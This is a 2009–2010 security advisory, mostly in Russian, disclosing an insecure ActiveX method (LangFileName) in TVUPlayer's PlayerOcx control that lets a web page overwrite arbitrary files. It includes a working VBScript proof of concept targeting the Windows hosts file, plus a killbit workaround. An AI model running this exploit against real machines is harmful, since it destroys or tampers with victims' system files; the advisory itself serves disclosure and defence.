DSECRG-09-065

Вендор

TVUPlayer

Продукт

TVUPlayer 
Tested on v2.4.9beta1[build1797]

Тип уязвимости

Небезопасный метод

Reported

25.11.2009. Second report 11.01.2010

Date of Public Advisory

03.02.2010

Автор

Дмитрий Евдокимов

Детальное описание

Злоумышленник может сконструировать html-страницу, содержащую вызов небезопасной функции LangFileName из ActiveX компонента PlayerOcx, которая перезаписывает любой не скрытый файл в ОС. 

Пример
*********
<?XML version='1.0' standalone='yes' ?> 
<package><job id='DoneInVBS' debug='false' error='true'> 
<object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' /> 
<script language='vbscript'> 

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 

'Wscript.echo typename(target) 

'for debugging/custom prolog 
targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx" 
prototype = "Property Let LangFileName As String" 
memberName = "LangFileName" 
progid = "PlayerOcx.FormPlayer" 
argCount = 1 

arg1="C:\WINDOWS\system32\drivers\etc\hosts" 

target.LangFileName = arg1 

</script></job></package> 

Решение 
***********
От производителя не было получено ответа, несмотря на 2 письма. 
В качестве альтернативного решения можно установить killbit на данный компонент.